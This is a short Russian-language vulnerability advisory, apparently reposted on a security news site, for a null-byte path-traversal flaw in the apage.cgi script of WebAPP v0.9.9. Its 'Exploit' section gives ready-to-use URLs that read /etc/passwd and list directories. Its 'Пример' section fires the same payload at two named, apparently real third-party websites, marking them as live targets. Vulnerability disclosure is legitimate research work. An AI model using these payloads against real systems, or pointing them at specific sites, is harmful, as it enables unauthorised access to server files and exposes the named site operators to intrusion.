Просмотр файлов и директорий в WebAPP Web Automated Perl Portal System v0.9.9.

Software / Application - WebAPP v0.9.9.
Problem-Type - удаленная
Vulnerability - возможность чтения файлов и просмотр каталогов.
Vendor - http://www.web-app.org
Risk / Severity - средний
Platforms - *.nix
Details / DESCRIPTION - Скрипт apage.cgi выполняет проверку на расширение открываемых файлов, но при вставке
"null-byte poison" отсекает расширение html, позволяя читать файлы и просматривать каталоги.

Exploit:

http://www.xxx.com/cgi-bin/mods/apage/apage.cgi?f= ../../../../../../../../../etc/passwd%00.html
http://www.xxx.com/mods/apage/apage.cgi?f= ../../../../../../../../../%00.html

Пример:

http://www.feeed.net/cgi-bin/mods/apage/apage.cgi?f= ../../../../../../../../../etc/passwd%00.html
http://www.fif.com.mx/fif/mods/apage/apage.cgi?f= ../../../../../../../../../etc/passwd%00.html

durito [durito@mail.ru] LwB Security Team
[lwb57.org]
Copyright 2002-2005 by LwB Security Team. All rights reserved.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии